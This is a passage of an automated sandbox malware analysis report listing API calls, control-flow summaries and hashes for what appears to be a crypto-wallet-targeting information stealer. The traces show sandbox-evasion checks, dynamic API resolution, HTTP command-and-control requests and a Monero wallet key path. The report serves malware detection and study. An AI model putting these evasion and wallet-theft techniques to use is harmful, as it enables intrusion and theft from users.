                                    • GetProcAddress.KERNEL32(6F060000,014163C0), ref: 0069A8A1
                                    • GetProcAddress.KERNEL32(6F060000,01416580), ref: 0069A8B9
                                    • GetProcAddress.KERNEL32(6F060000,01416360), ref: 0069A8D2
                                    • GetProcAddress.KERNEL32(6F060000,014162C0), ref: 0069A8EA
                                    • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0069A901
                                    • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0069A917
                                    • GetProcAddress.KERNEL32(74E00000,0142C928), ref: 0069A939
                                    • GetProcAddress.KERNEL32(74E00000,01429178), ref: 0069A951
                                    • GetProcAddress.KERNEL32(74E00000,0142CAD8), ref: 0069A969
                                    • GetProcAddress.KERNEL32(74E00000,0142C9A0), ref: 0069A982
                                    • GetProcAddress.KERNEL32(74DF0000,01416460), ref: 0069A9A3
                                    • GetProcAddress.KERNEL32(6F9C0000,0142CA18), ref: 0069A9C4
                                    • GetProcAddress.KERNEL32(6F9C0000,014165E0), ref: 0069A9DD
                                    • GetProcAddress.KERNEL32(6F9C0000,0142CB20), ref: 0069A9F5
                                    • GetProcAddress.KERNEL32(6F9C0000,0142C940), ref: 0069AA0D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: f1a0b7c9e1166457addf1fcf880ca5a75707552035b5ab903210d626c0d1d44e
                                    • Instruction ID: 1d5b6dd7ef71b190b95847a760e3353f8d06af550383ce8b7ae062e9c7d87e8d
                                    • Opcode Fuzzy Hash: f1a0b7c9e1166457addf1fcf880ca5a75707552035b5ab903210d626c0d1d44e
                                    • Instruction Fuzzy Hash: 0B622DB563D7009FC344DFEAFC88956BBB9A74D703750861ABA19C3270D735AA40EB60

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 801 6848d0-684992 call 69aab0 call 684800 call 69aa50 * 5 InternetOpenA StrCmpCA 816 68499b-68499f 801->816 817 684994 801->817 818 684f1b-684f43 InternetCloseHandle call 69ade0 call 68a210 816->818 819 6849a5-684b1d call 698cf0 call 69ac30 call 69abb0 call 69ab10 * 2 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69ac30 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69ac30 call 69abb0 call 69ab10 * 2 InternetConnectA 816->819 817->816 829 684f82-684ff2 call 698b20 * 2 call 69aab0 call 69ab10 * 8 818->829 830 684f45-684f7d call 69ab30 call 69acc0 call 69abb0 call 69ab10 818->830 819->818 905 684b23-684b27 819->905 830->829 906 684b29-684b33 905->906 907 684b35 905->907 908 684b3f-684b72 HttpOpenRequestA 906->908 907->908 909 684b78-684e78 call 69acc0 call 69abb0 call 69ab10 call 69ac30 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69ac30 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69ac30 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69acc0 call 69abb0 call 69ab10 call 69ac30 call 69abb0 call 69ab10 call 69aa50 call 69ac30 * 2 call 69abb0 call 69ab10 * 2 call 69ade0 lstrlen call 69ade0 * 2 lstrlen call 69ade0 HttpSendRequestA 908->909 910 684f0e-684f15 InternetCloseHandle 908->910 1021 684e82-684eac InternetReadFile 909->1021 910->818 1022 684eae-684eb5 1021->1022 1023 684eb7-684f09 InternetCloseHandle call 69ab10 1021->1023 1022->1023 1024 684eb9-684ef7 call 69acc0 call 69abb0 call 69ab10 1022->1024 1023->910 1024->1021
                                    APIs
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 00684800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684889
                                      • Part of subcall function 00684800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684899
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00684965
                                    • StrCmpCA.SHLWAPI(?,0142E2C0), ref: 0068498A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00684B0A
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,006A0DDE,00000000,?,?,00000000,?,",00000000,?,0142E340), ref: 00684E38
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00684E54
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00684E68
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00684E99
                                    • InternetCloseHandle.WININET(00000000), ref: 00684EFD
                                    • InternetCloseHandle.WININET(00000000), ref: 00684F15
                                    • HttpOpenRequestA.WININET(00000000,0142E280,?,0142D6B0,00000000,00000000,00400100,00000000), ref: 00684B65
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00684F1F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: 50e9a2d2d853cb636294b313ab8c1e6353106f0618362a2026574776202d6dc3
                                    • Instruction ID: 071bb850ef87ebfd9e2cbf76b5249b79d1e614fb7dce60d34fa30058c25eacda
                                    • Opcode Fuzzy Hash: 50e9a2d2d853cb636294b313ab8c1e6353106f0618362a2026574776202d6dc3
                                    • Instruction Fuzzy Hash: 8612D772910118AACF54EBD0DDA2FEEB3BEAF15300F10459DB10666495DF702B48CFA9

                                    Control-flow Graph

                                    • Function 695760: setup calls (695d20, 69ab30, 69aa50), then a loop from 6957cc through three similar stages (6957d5/695827, 695915/69596e, 695acb/695b23), each of which calls 681590 followed by either 695440 or 695510 and tests the result with StrCmpCA (6958e3, 695a2a, 695bdf); each test can leave the loop through an exit block (695a2c, 695be1, 695c78) that calls 6816b0, 681670 and 681550 before reaching 695d13, otherwise Sleep at 695c66 returns control to 6957cc
                                    APIs
                                      • Part of subcall function 0069AB30: lstrlen.KERNEL32(00684F55,?,?,00684F55,006A0DDF), ref: 0069AB3B
                                      • Part of subcall function 0069AB30: lstrcpy.KERNEL32(006A0DDF,00000000), ref: 0069AB95
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695894
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006958F1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695AA7
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 00695440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695478
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 00695510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695568
                                      • Part of subcall function 00695510: lstrlen.KERNEL32(00000000), ref: 0069557F
                                      • Part of subcall function 00695510: StrStrA.SHLWAPI(00000000,00000000), ref: 006955B4
                                      • Part of subcall function 00695510: lstrlen.KERNEL32(00000000), ref: 006955D3
                                      • Part of subcall function 00695510: lstrlen.KERNEL32(00000000), ref: 006955FE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006959DB
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695B90
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695C5C
                                    • Sleep.KERNEL32(0000EA60), ref: 00695C6B
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: 87501ab315a22df5e9555af7f67829c6f2f1c47378077c8a4b16206b56cb0f17
                                    • Instruction ID: ea4b6b16a569d9959881db616e2f212173f0e80aacd82bea3278ae7f8af2719b
                                    • Opcode Fuzzy Hash: 87501ab315a22df5e9555af7f67829c6f2f1c47378077c8a4b16206b56cb0f17
                                    • Instruction Fuzzy Hash: E2E12F719141049BCF94FBE0EDA2AFD73BFAF54300F40865CB50666995EF306A08CB9A

                                    Control-flow Graph

                                    • Function 6919f0: StrCmpCA at entry (691a1d); one branch calls ExitProcess at 691a1f, the other enters a loop at 691a44 over 691a4e-691bee whose dispatch block 691a67 goes to one of nine StrCmpCA comparisons (691aad, 691acf, 691afd, 691b1f, 691b41, 691b63, 691b82, 691ba1, 691bc0) or to a call of 69ab30 (691a71, 691a85, 691a99, 691bdf); the loop exits at 691c12 via a call to 69ab10
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00691A15
                                    • ExitProcess.KERNEL32 ref: 00691A21
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 635c0cb59e2c5f45b1e11db554bc03d29dca6ea11e54118f68fb9b18eaef32cf
                                    • Instruction ID: 25d1ef77735164569a4716fb62fcd5b34a215f9ef1922d255b9f7b6f1b87e41d
                                    • Opcode Fuzzy Hash: 635c0cb59e2c5f45b1e11db554bc03d29dca6ea11e54118f68fb9b18eaef32cf
                                    • Instruction Fuzzy Hash: 75513075A0820AAFDF04DFD4DA54AAE77BFAF45704F204088E412AB654E770EE41DB91

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,01420660), ref: 00699BF1
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,014206A8), ref: 00699C0A
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,014207C8), ref: 00699C22
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,014205B8), ref: 00699C3A
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,014207E0), ref: 00699C53
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,01429198), ref: 00699C6B
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,01416840), ref: 00699C83
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,01416940), ref: 00699C9C
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,01420828), ref: 00699CB4
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,014206C0), ref: 00699CCC
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,01420648), ref: 00699CE5
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,014207F8), ref: 00699CFD
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,01416820), ref: 00699D15
                                      • Part of subcall function 00699BB0: GetProcAddress.KERNEL32(75900000,01420840), ref: 00699D2E
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 006811D0: ExitProcess.KERNEL32 ref: 00681211
                                      • Part of subcall function 00681160: GetSystemInfo.KERNEL32(?), ref: 0068116A
                                      • Part of subcall function 00681160: ExitProcess.KERNEL32 ref: 0068117E
                                      • Part of subcall function 00681110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0068112B
                                      • Part of subcall function 00681110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00681132
                                      • Part of subcall function 00681110: ExitProcess.KERNEL32 ref: 00681143
                                      • Part of subcall function 00681220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0068123E
                                      • Part of subcall function 00681220: __aulldiv.LIBCMT ref: 00681258
                                      • Part of subcall function 00681220: __aulldiv.LIBCMT ref: 00681266
                                      • Part of subcall function 00681220: ExitProcess.KERNEL32 ref: 00681294
                                      • Part of subcall function 00696A10: GetUserDefaultLangID.KERNEL32 ref: 00696A14
                                      • Part of subcall function 00681190: ExitProcess.KERNEL32 ref: 006811C6
                                      • Part of subcall function 006979E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006811B7), ref: 00697A10
                                      • Part of subcall function 006979E0: RtlAllocateHeap.NTDLL(00000000), ref: 00697A17
                                      • Part of subcall function 006979E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00697A2F
                                      • Part of subcall function 00697A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697AA0
                                      • Part of subcall function 00697A70: RtlAllocateHeap.NTDLL(00000000), ref: 00697AA7
                                      • Part of subcall function 00697A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00697ABF
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014290C8,?,006A10F4,?,00000000,?,006A10F8,?,00000000,006A0AF3), ref: 00696D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00696D88
                                    • CloseHandle.KERNEL32(00000000), ref: 00696D99
                                    • Sleep.KERNEL32(00001770), ref: 00696DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,014290C8,?,006A10F4,?,00000000,?,006A10F8,?,00000000,006A0AF3), ref: 00696DBA
                                    • ExitProcess.KERNEL32 ref: 00696DC2
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2525456742-0
                                    • Opcode ID: d70a9d5ca986899a9a732d8a8e1b4dbd447454e2733b44687895a910e8ce13a1
                                    • Instruction ID: a9b8d01e90fc8520d3a02a66ec241bb752efeb6a343a148eaf29b3b945cf7343
                                    • Opcode Fuzzy Hash: d70a9d5ca986899a9a732d8a8e1b4dbd447454e2733b44687895a910e8ce13a1
                                    • Instruction Fuzzy Hash: 4131EB31A18204ABCF84F7F0DC66ABE72BEAF04701F10491CF11266595DF706A0587AA

                                    Control-flow Graph

                                    • Function 681220: call 698b40, GlobalMemoryStatusEx, two calls to 69dd30 (681249), then a check at 681287-681290 that either continues to 68129a or calls ExitProcess at 681292
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0068123E
                                    • __aulldiv.LIBCMT ref: 00681258
                                    • __aulldiv.LIBCMT ref: 00681266
                                    • ExitProcess.KERNEL32 ref: 00681294
                                    Similarity
                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 3404098578-2766056989
                                    • Opcode ID: 94b252179f8a2c2bd41604f4d3bffa9871c5797018221ad2b95c85a79c10c543
                                    • Instruction ID: 057379baa3af3d4b69e18e7d2d78c338d5dfa8013043d29b1206c17c72b20e8f
                                    • Opcode Fuzzy Hash: 94b252179f8a2c2bd41604f4d3bffa9871c5797018221ad2b95c85a79c10c543
                                    • Instruction Fuzzy Hash: 3D0162B0D54308BBDF10EFE0DC59BADB77DAF15705F108558E604BA1C0C67456868759

                                    Control-flow Graph

                                    • Function entered at 696d93: block 696daa branches either to OpenEventA at 696d5a or to the exit path at 696dac; after OpenEventA one branch (696d95) does CloseHandle and Sleep and returns to 696daa, the other (696d79) calls CreateEventA and falls into 696dac, which calls 696bc0 and 695d60, then CloseHandle and ExitProcess
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014290C8,?,006A10F4,?,00000000,?,006A10F8,?,00000000,006A0AF3), ref: 00696D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00696D88
                                    • CloseHandle.KERNEL32(00000000), ref: 00696D99
                                    • Sleep.KERNEL32(00001770), ref: 00696DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,014290C8,?,006A10F4,?,00000000,?,006A10F8,?,00000000,006A0AF3), ref: 00696DBA
                                    • ExitProcess.KERNEL32 ref: 00696DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 65e042ce1d3d63dd3d09ee8a2b8d23369e404f34bf1f1954bfe83230d6a44aea
                                    • Instruction ID: ea1c990df206069ebd595f30fe04e031bfdf137cd6de333073666136786f60e8
                                    • Opcode Fuzzy Hash: 65e042ce1d3d63dd3d09ee8a2b8d23369e404f34bf1f1954bfe83230d6a44aea
                                    • Instruction Fuzzy Hash: 69F0543064C305ABEF40ABE0EC06BBDB37DAF04712F100519B52295994CBB05609D7A5

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684889
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00684899
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: a87e78f1f54226d7edccf5f7810e71a4e9ed6546575c4c39ca4dbf6afcc6f2a6
                                    • Instruction ID: 70d83df2e5b2f3517267f732087af52696c7cb11486c8c6e0600a7641df6a4f0
                                    • Opcode Fuzzy Hash: a87e78f1f54226d7edccf5f7810e71a4e9ed6546575c4c39ca4dbf6afcc6f2a6
                                    • Instruction Fuzzy Hash: A2213EB1D00209ABDF14DFA5EC45ADEBB79FF45320F108629F915A7291EB706A09CB81

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 006862D0: InternetOpenA.WININET(006A0DFF,00000001,00000000,00000000,00000000), ref: 00686331
                                      • Part of subcall function 006862D0: StrCmpCA.SHLWAPI(?,0142E2C0), ref: 00686353
                                      • Part of subcall function 006862D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686385
                                      • Part of subcall function 006862D0: HttpOpenRequestA.WININET(00000000,GET,?,0142D6B0,00000000,00000000,00400100,00000000), ref: 006863D5
                                      • Part of subcall function 006862D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0068640F
                                      • Part of subcall function 006862D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00686421
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695478
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: 129d5819ef7d32e2a1f25cbd46767e3b5fcba249f05f29682651a7863159fb85
                                    • Instruction ID: 0ad99e0f74b603936d718ef83c23803cbf9764c10ebc1440f18e621b156eb435
                                    • Opcode Fuzzy Hash: 129d5819ef7d32e2a1f25cbd46767e3b5fcba249f05f29682651a7863159fb85
                                    • Instruction Fuzzy Hash: 8B111F309001089BCF54FFA4D952AED736E9F10340F40465CF91A5A892EF30AB09CBD9
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697AA0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00697AA7
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 00697ABF
                                    Memory Dump Source
